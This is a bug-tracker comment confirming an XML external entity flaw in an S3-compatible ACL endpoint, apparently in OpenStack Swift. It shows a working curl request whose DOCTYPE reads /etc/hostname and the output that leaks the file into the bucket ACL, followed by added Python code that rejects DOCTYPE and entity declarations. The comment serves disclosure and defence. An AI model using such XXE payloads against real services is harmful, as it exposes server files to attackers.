Comment 16 for bug 1998625

Alistair Coles (alistair-coles) wrote : Re: Arbitrary file access through custom S3 XML entities

NOTE: in the original bug description there is a trailing ';' at the end of the <AccessControlPolicy> element that I didn't spot for a while and it caused malformed XML errors.

Confirmed on my vsaio:

```
vagrant@vagrant:~$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: cfef77034aa96b13190894b26347367d4e95bc3aa2212f467eaae66c75250510" -H "X-Amz-Date: 20221220T193239Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20221220/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=660efe254e6d3210293e778718b5391ca831e2c814c8ec1ebb9300d004430d78" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>&xxe;</DisplayName>
            <ID>&xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'
vagrant@vagrant:~$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "vagrant\n",
                "ID": "vagrant\n",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```
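
An added example, not part of the original comment and not Swift's code or its fix: one way a service could refuse an ACL body like the one above before using it, with Python's standard-library expat hooks rejecting any DOCTYPE or entity declaration. The names `screen_xml`, `grantee_ids` and `ForbiddenXML` are hypothetical, and the sample bodies are constructed from the request shown above.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"
# Constructed sample bodies, modelled on the request in the comment above.
ACL = b"""<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner><DisplayName>test:tester</DisplayName><ID>test:tester</ID></Owner>
<AccessControlList><Grant>
<Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
<DisplayName>%s</DisplayName><ID>%s</ID></Grantee>
<Permission>WRITE</Permission>
</Grant></AccessControlList></AccessControlPolicy>"""
CLEAN = ACL % (b"test:tester", b"test:tester")
XXE = (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>\n'
       + ACL % (b"&xxe;", b"&xxe;"))

class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or is not well-formed."""

def _forbid(kind):
    # Build an expat callback that aborts the parse as soon as it fires.
    def handler(*_args):
        raise ForbiddenXML(f"{kind} not allowed in ACL body")
    return handler

def screen_xml(body: bytes) -> None:
    """Walk the document with expat and fail on any DTD construct."""
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = _forbid("DOCTYPE")
    p.EntityDeclHandler = _forbid("entity declaration")
    p.ExternalEntityRefHandler = _forbid("external entity reference")
    try:
        p.Parse(body, True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc

def grantee_ids(body: bytes) -> list:
    """Return the Grantee IDs of an AccessControlPolicy, after screening."""
    screen_xml(body)
    root = ET.fromstring(body)
    return [e.text for e in root.findall(f".//{S3_NS}Grantee/{S3_NS}ID")]

if __name__ == "__main__":
    for name, body in (("clean", CLEAN), ("xxe", XXE)):
        try:
            print(name, grantee_ids(body))
        except ForbiddenXML as exc:
            print(name, "rejected:", exc)
```

S3 ACL documents have no legitimate need for a DTD, so rejecting the DOCTYPE outright is stricter than disabling entity resolution and fails before any entity is looked at.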